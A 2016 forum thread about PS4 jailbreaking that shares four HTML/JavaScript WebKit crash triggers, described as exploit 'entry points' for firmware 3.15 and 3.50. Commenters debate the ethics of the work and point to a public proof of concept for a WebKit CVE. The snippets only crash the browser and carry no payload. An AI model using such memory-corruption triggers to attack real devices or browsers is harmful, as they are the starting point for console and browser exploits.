PS4 Jailbreaking | Thread starter: mcmrc1 | Start date: Apr 10, 2016 at 12:04 PM
Status: Not open for further replies.
Following the recent PS4 Dlclose Exploit for 1.76 Firmware, today I'd like to share a talk between zecoxao and Zer0xFF on finding an entry point for testing with PS4 Firmware 3.15 and also 3.50.
@zecoxao seems to be working on an entry point for the PS4 3.15 FW and wants some testers :)
1. Entry point:
Code:
<iframe></iframe><object onbeforeload="crash()">
    <script>
    if (window.testRunner) {
        testRunner.dumpAsText();
        testRunner.waitUntilDone();
    }

    function crash() {
        document.getElementsByTagName("iframe")[0].contentWindow.scrollX;
        document.open();
    }

    document.body.offsetLeft;
    setTimeout(function() {
        document.close();
        document.body.innerHTML = 'PASS if not crashed.';
        testRunner.notifyDone();
    }, 1);
    </script>
2. Entry point:
Code:
<input id="t1" type="time">
    <script>
    var time1 = document.getElementById('t1');
    document.addEventListener('beforeload', function(event) {
        time1.value = time1.value ? '' : '23:59';
    }, true);

    if (window.testRunner) {
        testRunner.dumpAsText();
        testRunner.waitUntilDone();
    }
    setTimeout(function() {
        document.body.innerHTML = 'PASS if not crashed.';
        testRunner.notifyDone();
    }, 100);
    time1.focus();
    </script>
    <embed src="data:text/html,PASS"></embed>
Also, the source code from Sony's WebKit ;)
3. Entry Point:
Code:
<script>
function inituaf() {
  for(var i=0; i<100; i++) {
    for(var j=0; j<32; j++) {
    }
  }
  try { CollectGarbage(); } catch(err) {
    try { window.gc(); } catch(err) {
      for(var i=0; i<100; i++) {
      }
    }
  }
}

function eventhandler2() {

  try { var00002 = document; } catch(err) { } //line 2
  try { var00003 = var00002; } catch(err) { } //line 3
  try { var00043 = 0; } catch(err) { } //line 45
  try { var00044 = var00003.getElementsByTagName("iframe")[var00043]; } catch(err) { } //line 46
  try { var00045 = var00044.contentWindow; } catch(err) { } //line 47
  try { var00063 = -1; } catch(err) { } //line 67
  try { var00064 = 0; } catch(err) { } //line 68
  try { var00045.scrollTo(var00063,var00064); } catch(err) { } //line 69
  try { var00002.write(); } catch(err) { } //line 185
}


</script>
><object onbeforeload="eventhandler2()"><iframe>
4. Entry Point:
Code:
<!DOCTYPE html>
<html>
<body>
<iframe></iframe>
<script>

var _gc;

function run()
{
    var iframe = document.getElementsByTagName('iframe')[0];
    iframe.contentDocument.documentElement.contentEditable = true;

    iframe.contentDocument.documentElement.addEventListener('focusout', function () {
        iframe.parentNode.removeChild(iframe);
    }, false);

    iframe.contentDocument.documentElement.focus();
}
document.addEventListener('DOMContentLoaded', run);
</script>
</body>
</html>
[Attachment: PS4 3.15 Firmware Entry Point.png]

Comments

I really wish we had all of the tweets still, but those got deleted. I wonder what happened with zecoxao that day. Anyway, I haven't seen any more legitimate updates on this topic yet.
It's not only about backups... it's also learning how the system works.
Intentions are what make it about backups, tbh. Sure, a person may start off with good intentions, but how easy is it to fall into the wrong path?
So far I've seen all the intentions of backups, which to most is about fame, nothing more. There's a defined line between what's right and what's wrong.
I've watched the scene go through ups and downs enough to know what my direct course of action is.
Hi, I can't post links. In wololo's forum a user published a POC; the user says:

I created a poc for CVE-2014-1303 that was originally disclosed by Liang Chen. Should work on firmwares < 2.50.

Here is the repository.

Is it possible this works for this?
If you're asking about the POC of running Linux on the system? You need to state your question in a little more detail.
Sorry, I wondered if it is possible to get it working on firmware 3.xx.

The git repository is

github.com/Fire30/PS4-2014-1303-POC
Yes it is, but only if these guys do it. I won't, as I know what the system is and I'm not gonna destroy a perfectly good system with their stuff.
After reading through the POC I can see how this works, but I see only one way for this to work on 3.xx, and even I wouldn't try running it like that.
How?